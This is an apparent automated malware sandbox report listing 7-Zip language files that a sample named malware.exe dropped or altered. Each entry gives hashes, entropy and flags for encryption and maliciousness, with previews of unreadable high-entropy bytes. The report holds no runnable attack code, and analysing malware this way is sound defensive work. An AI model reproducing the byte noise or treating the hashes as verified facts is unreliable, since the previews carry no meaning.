                        Preview:......pS.o~f.jK.9y..nr..c...|.4#...{w..3.A..+...pA...!~........._5-.A.f.%.S....".{...G..........gK..?uR"..Q4a..p)i.2......n....[..m%JH.7.N..4.......%.n.,.D.YQ....V.5^y.=...(s^L.b+..`F....m.<.U..(..h..[C.fi..`.&.w-:c%...yp...x.O].......`....7...^.N..u.1.......(......^Bo4..jL.%C..y...J[.,Q.+`..zJ.5D..... .>.e.W...O......I......)...$....4.\Hl.-....<[.&B&..........u,.....r.6.0.....<@.C.C{.l...L...[.n..1..[.I.FKK..WD.)*`.le.u.x....A.....'...iF.....<*...)E.h..G.]OE.Y...5.k...wLB...i.X...[.gy.6f.3..."....EA.Y.U?...kCqW..(C.J.Q@...w..R9..[.../.\...t.N..:y4...>..W.j(.<.!........|..1b....=in...:.Y...e3-.....U.~../..|gO....T?.".&>...6x......:~h.F....y.cD..m.wMx...Z..k...Z..4....L..h@...Y!..9.a....j.3..a..W..&..M7.0X....S./.b...@.xA......GT.2._-..... *...%.I...&.3.^<.........v.e.!.n...znp).....>....*..H.......|*@b..L.p.{S;.H.H...9b..:...a5...O\.V...r...h........a..a......5...2.P....w .M.AL..../....N..Bm..Hc.m...oL......!0...]...|nh.....

                        C:\Program Files\7-Zip\Lang\ja.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):12325
                        Entropy (8bit):7.982505993992901
                        Encrypted:false
                        SSDEEP:384:6E5BDGc/BJqRQ2eBCtLNILBtq1aAUIXSA6gAij6b:6E5cc/YQ2luLBt2TXSxg9K
                        MD5:CB4BC8998E53A46E070584A053DA9246
                        SHA1:B0531C0163D87E8E1A37507B40681A8F8570D91E
                        SHA-256:CD81A79766F7F2119F973B34540F7BC41EFDA1B084C4ED31D593ED99E27AEEA7
                        SHA-512:9AF44725E89AE8E71D307ECB44D46BFA3CEB1A7A26AABF3B85877007F66795503816D493DED8561D186F4C8CF27D87E21F2D1CBEBA736A945E91493FF6A51145
                        Malicious:false
                        Preview:p.....~.H`.?I.v./...ojU...#.:{..s............}?...C..|.......A....Q....c.w.../..FJ.E..=....8..1X..24..c.=.........e.*5.oY.h...",..W=X.:.p.%...XWH"....Q....Q.|u.q[x..tT-l.+.R.........kt.Nag6....\B=A.'.G..a..[..\.........w.)s. :T.#.q...:.3.,.vk..E...x.wUj..]@....B.1....<...1..7...u....|..w&...sEj.%.iN..Z..a..G.PsW..].Gr... Oltx......E.+.......u..$8t5..#.Y.\..j|..W0.dJ.n&.z.v..F..7.o......1.......6..?=8.....s.a.q8.s..GS..O..._.J...L.5....](..s.I*..~.u.>...+....s|....Vi.?...K~?..d)h..T....W7.G...B.......t./m...,...lQ.>(.......o..L...|?...N..[....'.v............$IF..I.C.....Z......=*z..<.kV6....e..N^.X....s6F1gn).5....G."...<.N.h....)\.....6........T......,..GH......8c.I.`.5eaB....BN)+...Z.TG9...s..J./.C.g?,6..&.0A..D.l....u....c......w.&..}.V'....,.....6.c...n..8...'."..h.l..0v#.........O..2..v..<bjB.w...3...k.B.X..h..J....C..}X.E...wp.e....G9..,.%.ZG....T.....$...O>.S2..Z.#....c....h...bJO.`.b..$kR..t...?.....>..E(M.|..o.:..+....T`..%.Mm..#....9..*..

                        C:\Program Files\7-Zip\Lang\ka.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):18311
                        Entropy (8bit):7.991546908748324
                        Encrypted:true
                        SSDEEP:384:qqxYeGStc0uqUSItbizyUmhm1GrerefPxV/J9oqUUAfCZX2Ri9h6as7Z2:dPGWVUBbiFmSGreOpVx9oqeCAAX6as7Q
                        MD5:688E6DB5D343D0BF133C783C88206D21
                        SHA1:F14DF1ED9E22BDB576AB87C3A918599594713886
                        SHA-256:7C69452CA639C4A3F1244645BE6047DE6F9D7156E21AC6A2AEE2428DDC640D83
                        SHA-512:F1B1F1A20F7150ED57DCAAB173F2CAEF48E8A5D59D07C94F966899E4869C13AB73DDA3452125423534A09384FD523C4FE2940F7B9FAA4AD96540229D3C62BCFB
                        Malicious:true
                        Preview:...)%...*........,..D...=.......:.b..]..vA.C..|...yoF!..j...k..y...<Ye...%...I.u.....JV........I..uF..m.0.U..K../.@=.5...B.*..X..lO^.Qe.2.vqb....Uw.1..q....)....MM...?.LLKF.rO.V.[~..t..5 ..>...k.M..........>.)..wj.1..4..Mj ...../..2.....:..>.......|.}7u..AlP.a..8......8....i.t....$....k;.......6M........`...\wY...6....!....~.....1.o.[...`...x...M..6..GF.w.;.2..E....-eg.pX<qG........._)..hV=.h#~q.bN....].n.@..8...nQ{.q...>V..Az.9B|A7.B.~>;.2*.=....9J.M....QG...>Z.....5....1...;.d.Q~.'..\k.2..\I..5..FO...d....&.Hy.......E...6.G.......I.h.;....w...f...._......Q.....M. 6E....uM. $.......\in...e..s.u,.p@...-|...i*uP..o.>p0q..F..T...xR..m....>.....> SO..5......X..M9.K......).N.F.xo\.yh...q`.>...[G.......kx...vz.....A.V..q.f.p)\X..w.?P..@...:f..>....J...`.a$e?]U.<..T.L...._.a.....i..F..k...C...R8................h..}..e.=<b.S..cE..`xt..b+.i...Te9...V...h.....D...v$e.....+Z..S...A.'.....i$.m<..[V.S....9....H..,.. ..I.z..O.B...x..4...3

                        C:\Program Files\7-Zip\Lang\kk.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):10840
                        Entropy (8bit):7.983983357356068
                        Encrypted:false
                        SSDEEP:192:i6aOYlPXMt7Cxia+GGz+teYBkB31o69MdpcKkPQIacG2zg4P8yV6clTS/zoAia6:eOYlPXVx/+xMedB3Stdpc5Y7cG2zg4P/
                        MD5:40CB5DCC6EE9C477DD0BC935F4A913A1
                        SHA1:B2296DC808689679B8B9A0F994B9574C33E43985
                        SHA-256:D5CD7EE6B174CF3A71B46AF283D04B45FC139FB72916A7070DECDDABF89BEDDC
                        SHA-512:0A4941B230134F61A9BCDE8274FE409B642F4E24D77312D5CD69C30FE34B1265953AAA73CA22FA1FBE7737AB99CF620ADEEB9AFF5A0262DA202A286351E74FB0
                        Malicious:false
                        Preview:.H|#......B.................Z...r.....M6.B?C.;...^..:..g.^..v>g.....J.~6..`.6.....H.....(......l..T.tD....5..c.....-..]..Q....H.')Y...g;...\.ae...8.......9.F..[-(..8............_..am.n;..E#.h...~A.U._.....3.E.s.....:]e...:)...,.+.......'..&...4.I.n......@qdzD....'..u..]..j.Q`./.9:..u....rA...u....`.~'.G6.D.G..fEf.7.D-........`.Oo.Ls...t9zr.."[...<.....s..K..v.4.$t.qd..C....=P[5...t{6.....0bQ.....?7Z..&...F.....P..y[.KU..[.....p.5.z..2...........4.C....dZ.l0..'.J..N.d...Q...l~..|.....d.a..J.7s..*.....;.X.i.H6.}.I.`_..R0...x.<.x...vox.....+W..8.1.C....k.T...P..l.{.r..H....A...^.S..m.U.v...xB......_RUq.B..........<.b..s.....m.gj.d..O.u..DH....3...b..0K:./.e.M.8..z....A...V....a.:..7.....@G.yO...D.q.. .--;.,..X..".`_.t5.........X..7ZgL.j....r"*0.m...])...o.m.i.z.!M..p..f.0.xXIC>g.2...mx....Ts..-Jv.a......./.........1@.........8s..r......5.......Z..s!.7........9.sO.}..-.`o...y..j..$.F...k.L.x..6.2I.....Z.U.=.GjJ.#.><...8(.0.c..(...+cd...

                        C:\Program Files\7-Zip\Lang\ko.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):10397
                        Entropy (8bit):7.983031011270739
                        Encrypted:false
                        SSDEEP:192:xVHLNTlMQYiY8wZ3+Uad/Rz8YXWsz20ghMbnor8qgQVg+V1eEAb9jSL:PrNTlMQ48wZuUSBDzvg6borjgjuMEAML
                        MD5:EB0349C286B1834E7850D8AB0169C8E0
                        SHA1:8904A8A5A7DF76D3BE71C48838D84B32F7A6CC83
                        SHA-256:88BB1ACA25011ED1C5960AC87726D9320A5EF11BA2B20A6B7F794F2F17A1157B
                        SHA-512:F842AD3619B13010680D4255A1E990F1DE39A1E98265884BF45026E2A5796B1AE1C51475354BA7ACFA11BBD394028EDD0BE1C04CDB869929715258D96391FDCA
                        Malicious:false
                        Preview:..XS.}.{..G..*,.NLk-x.4..+K..c6.AF~55.&..lM9.i...c.....3.d.K..;....=...8m.>..{..}...*W...........N.6.@Ao.k?..q1.#.T..?.............%..3..6..0Z'.........>.d...7.P.5.'.Z"..jfj[M..#...}.=P_.i....l..n..Z..t.\.j.<.f..@.z3..c8..[....l%V.ZI%$.:.^.e.z.,l....1....X.N~.._L.f.?.CgmHNE..-...i.G...[UTgI...}....Z..V..V..r..L.|m..ulN...&.2.@.Z.g.....Fs._.|@bkAc....]...X...\?...HR)..&...=.;........... ...j]+.4@......>A.M."...*.[O....L.a]m...c..u.}....Jo.D.(............B7Lr......r.i.r.g.(.&d?.........<.f.J..d...US..a...o.(O........ Mm.?..v).C....E..ml...A....!....R(...,.....s.^@.=9.Wa...2o7.....T.e.D$......d8C..fm...].&.G.v.o..^YP....1..*......d{/.....R....<..)..;.h......K<.......,..a.m.O....B...X.>........Q.}..jh)d..2..RS....$..0...E"..4...9o...4_Ar^-2.c%Tx......../".k.`C~...c....v.8...K.i..0bv..#.....H.VGx.*.W.."..b).m.;.~p=.S..u3..`.;.H.3*.W.=...V...C..mL.d....0.w...c=..U.?.d>. .X..t....,.A}.LU}`.G.q}...D8.'....fp....%.^5o.K"#....a.].J..7@.

                        C:\Program Files\7-Zip\Lang\ku-ckb.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):12445
                        Entropy (8bit):7.98483568024334
                        Encrypted:false
                        SSDEEP:192:Un3GEvNPcktv8b3aHXFT2QrOWEC9zuDn5KktQ2ZjSRvTd68IIevbGQlS0:wQkyb3a3vrOWES69Kld6Fp
                        MD5:F456EF2FADB232FA8B645B6C73FB103A
                        SHA1:F1C97EB6CFC69FAF14B6912D208E737E27B66AAD
                        SHA-256:4086C7AF127C5AB890E8A3D020BD64F06828E895DA3ED99D9ECB965F7A58116A
                        SHA-512:CF3A2799F551F6D7B22FE297B387B45E6347785BB7F59A21797C6CA8F34D32764B8FF74DF081BB77E1E5C9B6E93B2457F50389DC29E9EE44E7A8B14AD4F17720
                        Malicious:false
                        Preview:.Y...*Q..B.*.jQ<> .z...c..D.c.U$.s...z.....]5.......s./W.....!U..x..iO.L..0s\.......-C.....G...../..4.........D0...X)*_..b..t...@..:/...LGi.....2..=..R......@...g.V5...X.z....,W.....0z6...... ...../...O.$"*!f...|..W..v`..{.7.\&.....ZP......_. ..k.E/.#.3.....U].t......C...Pn..'..=.]),.9?...s=..+.z....@w.>.z0D_bH..a\"L'.q.....S..(MA...".....'E.Xzm."A..?-'..u..K.z....tr.`.......Zafs.._.fp.4.%p...H..`..I....tx..!...w"Q.S......W.....h8]aL#<h.6F..h.A.._/(..>+.F.H..T.r6V..M....)...*.....:X...I..'.Z.H..\.n..W...Y#...`.T.3..Nh.1.Th..V<9..'...e~.......cIe..!FQ.(Q...L..K>}..E.B_V..h...W..6..ct.........~O..p(l.....S..K_<.x.....!..V.D..2.|W.._...&...%...\.....6..u{M.......742.`.o..'........#...K.~.....:s.w.l...............1H+v..RP2.....sX..>...+.f.......=d.....rx.0.$......`o.96h.........g.{.B.Z......Kp.....lt....m V..q.A.(....4..$...$Gd....(.&c....8'.7D...50..S.............cL).g.h..;w.K...+......)..^[.N...fO.Plp...C.....@...A.&...V......g.Ff

                        C:\Program Files\7-Zip\Lang\ky.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):12564
                        Entropy (8bit):7.985460307320185
                        Encrypted:false
                        SSDEEP:192:oLI9x949gbaVx+dSQBGcgDo6cboFin/4TT1UrtKDlBVqGKsf0y0lZaE4nH6mxHKm:jL49n4dgD6nXZgmGtf0XS5nHM9SYw
                        MD5:3A40E25DB6602A62855F10349501464F
                        SHA1:31F1D1AA372AFDA0202408A2A4BD077820A5F3CD
                        SHA-256:A6D7F13A4EEE2049A13DC6295F79B79442E3BE2E1F9B6EE8AA4E468C6DC41780
                        SHA-512:15A2DCBA588B7FD07E529DC5FDD84948CD52D50DD02480DA683A915CF784BDFD2834E35B3268FF25D52D9096A70F52908AE5701FA8909F2E17C4BAD1824AC2DE
                        Malicious:false
                        Preview:" .>..%...>..SOl.f..{7c'.C....x..^^.....h........2.&.I..n%.Qj....._..l..,..{.0*.q.......b.n...Fd.Y......?...3pYZW..B?.D}....i{.n2..*..6.e...j:^!C]C........{.4p]#B..9.~&.....i,.Vi..f..gY.!*..p......h.g...l......WK>......G.!...t ...y.<.9I....WzN....E.. :.g5..e..*.22.s.kc(`.p.......\>.P.3...t..G.b,.9..v.q..Y.a..R.......z...HW=c...}u:>.W..f..y.6K...S*A."..=...h;.#@...y....v.NA......9^.s.F...%..zd..!..B...;S.........z.1N...]-..S.A/.....:..).1k..Zr.pw.o....z.\|.m..[...d..a.U.M|.N.z.N8..Z....w/."....z*...Z.....S.'...#a....e....V.....R..rD.y=4..v.H.Sw.p.@.1*.6.....t...N(...n....._..j.%...]...|.'.?........$.ot..E...l..e..!._...Tz..z.k..I...2.M&M..W.jF....=|U@V....g.D_..{*..u..v.Z.#G.[.....?.....#..5.*<.@....=iFSu+A8G.{....!..Mn1N..-_2%..0..ro.".).r..... *N77ff..v.....F._8@.q_.c..L.#.5y.K...Q...0E..w...H.@t...~x.ro..(...-...)._...h..Bjv....Uk[.X..;.....h..Sq..H.1.?.?.UH..}..J.a.......G_.0..&.D..7tq6.5kj.[..J.e...q.G..E.<.../...C.Y.ZU.k....../$.

                        C:\Program Files\7-Zip\Lang\mng.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):20298
                        Entropy (8bit):7.990889513656349
                        Encrypted:true
                        SSDEEP:384:sgipQzUFpLledwgnh57LLLl3Vgmh9z3jOmsrvSiCXFpBhdUR1qM:sThedwghtfLZVrR8VGBhdUf
                        MD5:20C7052153DE1D5879A74A7EF2E7DB60
                        SHA1:EEEEDAFAA4D3A16482EB181E6F8FD062975A224B
                        SHA-256:89233E6B08C65ACCB008C92229E4B9EA4029657CD5D900B0AE6CCFD07FC97656
                        SHA-512:77E3CC18A1F82EE4EAF0AF4659BDB46F90783957915105FB8310F9D2B10A4AB7C35346B7F28CDBE20D55763364142D0F0206B70C9A7456596F88BE0E95F61DC3
                        Malicious:true
                        Preview:.Y...<....~.N;4k.%j....R>vx0]..EK..'v..1C.@HG_.+..5O.@^....5K....h..,...=..u"m.....9#wv....bA...".."..e.p..P"..s.Wuu..}%...dY4.-z.l.Z#cQc3....N,.B......=........$..{.W,8......7........1...e.p.*..&^..9.....^..<o.......E..`...@..2c..[..E..jE...#.Zz?.........6.4&..NF.`.....I.rH`..NQ..].D`Z.. .h..$jV........eQM.On....].^..%.Uc:.V...K..R$.dcj..ht.ic... .<.....g]..v,....!+.....~..:/+"j.].6..TR...f..j. o.l....QR.`.Xb.z....<..2..E*....b.....HQ.s..Eh1....7.f.....*.......,bD}!a.y.j.....<g4......h,...K....`E.$....v\.......\......4k..]8.Xa..,....(..~.)%....F..r.'i....7.......6.a.b.}$.....`..|..."u.B.4C....J.O`T.O.R...].~..drq$ %.....Hx.tg....9..........:.T.7..-|~........xJ....F..'J.L.....S..+{.\3..y._2N...C>......Lf..t.P.$...~.r."1.-\.....V.e..lf.s......6(7.6".>.%...z.....J.N.3..d....<..`.......?K.K....0..7...A.....?..j...d..}..s....c/....\..N..............=.:.....`>...5}9.n..O.4..%.}.k...r.5....%.p1=.u..y/'G.3.FK.y.........u..q.E%P..S.l..z.....9<..q..

                        C:\Program Files\7-Zip\Lang\mng2.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):21681
                        Entropy (8bit):7.9911513403912755
                        Encrypted:true
                        SSDEEP:384:znwyE1iylee7EonQOXOWf8M6MJehKkodycfbmy81v43JLt+:s7rQFOebM6MUGdycTmBx4G
                        MD5:B03A14994D86F3641542923B91D51751
                        SHA1:D94AF9201F5CDD314BD46E68254343C015D25518
                        SHA-256:ADCF34B2A681DCD8A595B31AE3EDE5646683AB4C367458F7592BF4ED7A12822A
                        SHA-512:B6B16E0B01F805EE0E10C76DA28F4FD51D33806DCEBC04BB7B4821E57013EB494411FAB14E3709F9D5B301DE7D29D751DE22252BBBD6C2786DDA7B56D2392CA6
                        Malicious:true
                        Preview:.bo....*.........2..~..O`.....Eq0.;.BC...Hf..'...g........mX.W..c=.P..3........E.O.. Ng.....f.-O....V.m.xw....:..M.%k?......N..H....DgZ........'.b.....t..Bj|.B.3c.iRv.....|A..Tx.W..xE...w.........5U..t3.d6>...RE......}tj.-*./....[.aIJ ..Ey.:....y.<$.@..tCP...........\.g...wH.`02...#.bJv....B.p.....#....`..L..5....EKV..K.....].k.5kMS..s.....~.....I..<..).Q`..\.RH;[.......p..@.&.K..y2..7....+$QN.Yd..E.pQ(.7.{..vs?.u..j......8.............i'.......h[.....P<n..C7..6....|._h.[.$..j....Q.q;[.]L...we...B\?...0..Ir .....`...`...L......l.H..0M3.4.....n.Ox..N.G...lp..:..C...1.G... ;.....W..=EI?W...:....|^.. ....'....7FH_.;,......F..lZy).K...N.F.z..2.(k.w.K....6.3P..p....M7].Xz...6A_(Q.....8i.!=....z..=~.Ol^..y.N .].H5I..0f..a.V....,..........E.MO.~.._I.}.4...@...r1p..c.n.D.-g*......%..a.%.Ag.KK...8.'...4..=..`.#.:..cJ.4 T.c-..B..s.....'"t.@....o...[2<.Q1..r{sy.1^...5.X.`..j...F^.B7q|s6.M..x......,.*.....6}Q.q.....=...^...7.....E...u]...U..

                        C:\Program Files\7-Zip\Lang\mr.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):10907
                        Entropy (8bit):7.9793051354129085
                        Encrypted:false
                        SSDEEP:192:DyAieVdt2yGBqrGiTXpOrJIjJzdwtQEkpceIEo1zXnpozwwni:g0WyG4Ki9OrJIVs0pFITJXnp4i
                        MD5:6CF0CC9D3D6775C5B87056A6A696456B
                        SHA1:526ECB3F28E210D96A83311FA79FAADCA1C3D6D1
                        SHA-256:7A62801300DF07173C3EB8F91C005085492D1D49CFC4E494F446BD5376919CB9
                        SHA-512:6675E5120626F0C24C9B0BFE2681FE61FC2FC845AF50935816E7EF2CA685EB11A33FD31D8566ABA4818CFD18647CD12D4F198AE1DE426498C632C956576D5000
                        Malicious:false
                        Preview:?.hXL$.....T/SS)./.P..Y.... .k.<N..h..;.s........6..bt.|.f..............`G.:..n?...,Iw..Od.K.l...E;.|o:.1.8.BL.,.Y.1....`.....N.6......Vo...S..g~....V?.X.@W.....%....(>^.]...1..4.....3....m..p?A..l.,R}.q..H.(".....\R.Z...Pf..M.].7...X.7~....!.n.L.g.&P...E.../.G~..X~K..bF...K..8..z...K....s.....).Y....[....%..^.W...3tX...`k_8..7.p@.2.>.........3.f.'9...5.M..\..#P#.*@.U%..0Q..._/.:".o,....eR.-.OM0:p.l].4.6.N......}..o~...l9px.j.y.p.y%...0F^.C...S.....mB.M0...8:....q}83..vo(~..v..P.}.D.-...{.S....}.;..Q,..&..i...B.E..d.<..&3......@..9..b. ..~...I...2Q..g.F...q<.egG.@........Po.r.N.M?/C.|.;..q$.....9.)]...Q..2Q..V..PO.....6..L.).-x.@..3.$g....g(.{.|.(k...TU.l....95&.B....`.$?x}.(.L,Oj.'K....3....x.i(O.YX.#.;....M.A.6..$8...<.<....jy....2.B..h.i.........c.E.7......t...qs...3 ...*./..........n.........<....E.v.r....Qj<....Q.C.7...m'...'C[. d9.T...]m..0.k[<......6.W.....c...t.I&Nmu..&1R.8.L.f......~"........l.....#..V..6x.......XT=d.c..].w`fXW

                        C:\Program Files\7-Zip\Lang\ne.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):13562
                        Entropy (8bit):7.984734010608343
                        Encrypted:false
                        SSDEEP:384:G0D6LOXpcDLWtSZvaa1wo6r/LhZANz3A90LXyNnu:G0D6aZcDLWEZaoyLhPz4
                        MD5:709F891CB5D7BC13F38A5586E55CD926
                        SHA1:D936C30884EDBEBA0ABA0A152F11205E4C92F7EA
                        SHA-256:314588E9A23862AE044D393025CCF40300846128254583FBB05ADD0B7A6FBB3C
                        SHA-512:D03A1BBDFFE77DDDB4CA308F173DC677A31B8E6991478BD5EFDBC8FAC4B6297008BC7DD282577BF0D28FEA5FE7A67B36BE0903DF4CC0D763E0304BF18B958074
                        Malicious:false
                        Preview:...R...B..>6....LW+eF....F.o..W..!c.o.....k.8'....5R...............$.'.&.U.Y.NZ..^...0.!.....K...sca.T|$....}6.g....aO.|.......SJ..?.R.!..i.c1x':."8K..%.....vX...$..r#(U.O...8.P...B&-..E...B.L(.....g.R........g..`.....e......[k.....s!..O..2...d...=.'.S.x.@.x...5~o.>..AD.WE.D...).T.z2..T)K.m.ML..z..&..).:.BS;D1.Bt.:d...W".F.8s....CSf.hp..6v..7l..Ep..&9.W-..v.}...S..1..7.R.T..')`W.s.~!.V.YIz.i.....4W@..1..3.3'9....d..V.K..q..=}...v.5M7............N...D...r.s(!=h.S.[^.w4r....H..@..F...4cR....."H..a....2P.a..8X3D,S`V..:V..+].....a-Y..U.GG..G&..S..SQ.,j.'.9......]A.0.3.7....X.|...0#W.Ux.(;....N...1c....i.}.R...G.G..$...WM.~......T..%.:b.<n+,.QFu.,...1.VT{...$.V....X..N.d[.$^.......!1n.....G.#u..6.....1L..d/..uF..di...w...$....mx..n..J.g.u".].I@Y....~.B...$...CQ.1B.L......Q.Ce...Y...q...&.(.L*o..#..i...T.....vt.j.....R...sg.dy......NA6.T.=~._..K..c9..se4.U.z...jV.N..c..V1..i_..f.I#H.K.g9..s..dW...W..Bo.....d..-..`..#.....p^....U..`k.(....G.

                        C:\Program Files\7-Zip\Lang\pa-in.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):14771
                        Entropy (8bit):7.988336947324307
                        Encrypted:false
                        SSDEEP:384:3STOTTgkQUKLym8FgCHx+issHAglivdbDYcvOJHFI:3YjkQp8qCAiseAglAbc7HFI
                        MD5:78FEAE0C78E68F2710873F8A23AE6CBD
                        SHA1:C0CC87A55949EA061BE656ED0081589A7DE2F878
                        SHA-256:0DE1CDB8ABAB5E78785A50426D86421A73E58081240ADCA973D3F316C724891E
                        SHA-512:425BE17E0873DF0E46F61A87B4670F46B0BA6508E1A1D7785C78E463830BB2265EA1F7743820A478B5BF6E9BFC4834B69CEABF0CBD6E7BEA50A0FBA9203C2743
                        Malicious:false
                        Preview:x..4_....p.e.!.NNI..[....g+ii:..(...!.K..........ln>;......@w...X.ua8.=P..v.k..:-..o'O..kA/L..s\.h<..*!...f.WMt/..t..{7(f.7...6..T....,Q{..7Q-............L3.KE.C.."C/.e.1......w@.n..g.../.ci._..t.2a.q.qFk8.........f..ca.}.....i....Up..5Q...I.=..}a....A.......<..>.29...a<.`.:...#4/W..;.......rn..I.1.9=.....(.j.]........,...Ev.#X.nAb.P%c...7.k..K.O...u..K..h.7.......*.9-....~..7..Z*....n{..s.*M.i....../....O....~.xC{.p...lM......h..*QK....Y....gtm.Q.w.K.]./>.L._..X.G...,..../...P...#Eb....R....zM.;.#Z...A..W.zD-.}..3...^..nn.d;..l6.G$....$..j.O.....W.....4......>Q.T....{..{O.....,Q....8"Uv.^.^.n...7t..(..h.>}\..b.n4w..C..*..}.0...].Z.ZW.V&.5s..Pc...>......D...&.C.7......h.!...T.ag..)...~....JC.T.x..-V7........\......p|..tC?H.W.\.O.......F.<.].\.h...Z_s.P. ....pY..0.M.w...5.e...Hh....4.W...........,.O.....Tu....M.>p...6y...qT..m...*7....Y.;...ld.9`\C!..l7.l.c. ?.1....c...9T.p.}Z.dS..C..z'.....{..*e..:.....E./..0..r..7.t......h.........k.\

                        C:\Program Files\7-Zip\Lang\ru.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):15474
                        Entropy (8bit):7.9870774731551855
                        Encrypted:false
                        SSDEEP:384:Mo0QXCyGofJqtPK/3MiUhDQkqnvv3piL/+HH6voPgW:Mor9Gof0tCpQqf4wH3T
                        MD5:08F2FFB340DD1CFBA218E0100D49B2A4
                        SHA1:8EB8720CDCAB91AEF74751E3D34A946AAA262407
                        SHA-256:61684D6DBA28410A6DE7EE1749CBD7C881EAB590C63652ECB70B46AFE7C27864
                        SHA-512:483B7D019E8D30FB5592E25D1B650A596F3CA258DBDE76F8B609DAB96A6D1C17E301BC443127F80FDF4E4513BC35BF65626B1254949D58B4956D99E9BB94FD28
                        Malicious:false
                        Preview:X...E.....@.u.....y....:N.y=A....G...!........AFV.........T...*.V,...1..#.=/.......R..Y....IA..(.....+.......r.O....X.Cv}K....tT,6.s.....>..(.D_..........3h....'.5.&.J'dO....$%.L..=......C.i...8{g..1..j...n.t. ...]>f.............}...1.l4..a....J.q....\0.......&q.-I..)+z......,;e........v)...%v..H....^"..P...%..I`.ME.B..3...z.......g.4...6.Sk.n.N e..W.P.....y.6.=o7..SdQ".......9.b*Z.....D.|.6.J.o>?.~.e.-.R7.U..)...<.Cn..q......z........F2&...(1j.%.S#.0[R...|......*.....l.V.......dm.M...u..4....>1.P.R9..F....i.m..p............x!l...b..Y.....].t..=..&.(.2..Q..B..:N...l.7......V.Q..I......s.V.O....'.h-(g.3;......6G.UXoD.*...."...=..C......1Y......a..X..r....oVu..HZ9...>..Rm..,b..9.Z..8a.....>S.Q.x..^.b.4}j.I..t..*..`.u@.J_D\..[...qGLX..7.X..c...b...zK9..a..{1:.:2....{.R\G.,.R..`8k4.T.o........+....../.BaF.;y...o......._*E..;....T.P.9..........i..k....zV.@.........Z..Tgmo.......;Ft..q...v...">.V^.fGq.B...Y<....y.H.{...u...O..........i?.

                        C:\Program Files\7-Zip\Lang\sa.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):19346
                        Entropy (8bit):7.990425140767699
                        Encrypted:true
                        SSDEEP:384:Adr8vQF8JWeVWNuZdWcmgcmBDxVbXDDG5eqD8mtJ74wjJ:YqQF0x425X/AeqdxjJ
                        MD5:B3DA2A4EA13529D4EC5277D3458C4EC7
                        SHA1:594BC1B1183AF4CA8DB7660323EDAF046456902A
                        SHA-256:11F33E2D782139F8D14D5A5D3C344C27CB2A8688372BAB01CCD646EDC514FEAE
                        SHA-512:FE64404B42EF16C293C82B343B1B72C312CDF86CE2A421B02C30FBD1FD4FCFCE1C6F3484316BEEFEFEB02FC2658505C99129761A7070FB904D896AD28D92F40F
                        Malicious:true
                        Preview:..q%a,%.Uv.z}7.I......9.ij.c....Z...=..D.Zt..9.4|.`MG$w._4.Do..K.m.@..}..%i..io.....;|.........p..../3.0.%........e.....OU.....@YN.b.RaunH...J.Es@......m?...^p!.@.......NNN...(1....{.{.....e.N..8Ot./..05.[..m.}..1x!B.I/Qa...EeW".u...y.4.Z.0...&:`.9...._.<bk.y.....gQ-.f%b..~.w>-...J..|%.w....gF.QX....Z.._P...|.%...$..4..0..k{.."........RV_.4ZO1Fa .8.*O...U..(J...1h.|...;.>+.s.l3.M.40.XT{...9........@.{.yM........~....Xo.$$..H...c...5...qG...OUPL..P....RW.TZ.w....{.u*...U..E...... ZKN.....*.i.^(..c.:.1K...J..P0hk..l.`...x5.or;....y..!.MC/.F.`..5.#".9.r..g}Id...)..........}.".q.Dr...c....-.\.....!`.h.M..u..w|...R......t.....j.y..Jl..K\..dr.....67.J.?.(.:.7..7`ek..U.....w.....b....Pn!.h`........&....*G^..l .e.R.0.[9.3.$.i..N.!.9.!..O1.+..C..Iy..RM..:c.lK....My...3{.+.ur.K.|T&JI {~..(#mH.7.....Xf.C.'.4....b...rgJ..M.v..._6PH.....k...78....M..v..8....\V.....3~YZ6e.?_.[...}.rH.)5.........),..l.G2...z.f.?t0C3=".>..s..ej..J.U...<......

                        C:\Program Files\7-Zip\Lang\si.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):19309
                        Entropy (8bit):7.9906961761066535
                        Encrypted:true
                        SSDEEP:384:KhSCkQGodxqU5YRqCi89p29oBQEnUrR7ZFvgl8ZCXlrOa:DKGoHFY4L427TFvUkyrr
                        MD5:FE413B3AA259F8218E48C155312936C0
                        SHA1:9A5A9D5C968806C81D6B79318B0DB97666B1574D
                        SHA-256:C74DCFA3A1785020F43F73E7BFE892C93EF71B6B1C8AC03A1553B08EAF243C38
                        SHA-512:CAB942E4ED2E17EBB03A4A26957EC663A056D69D9A4FF047253D9578634376C9255746DAB25CCFCAF73A2259A02E87E93833E6A10904EBAB01251F6F0CB83897
                        Malicious:true
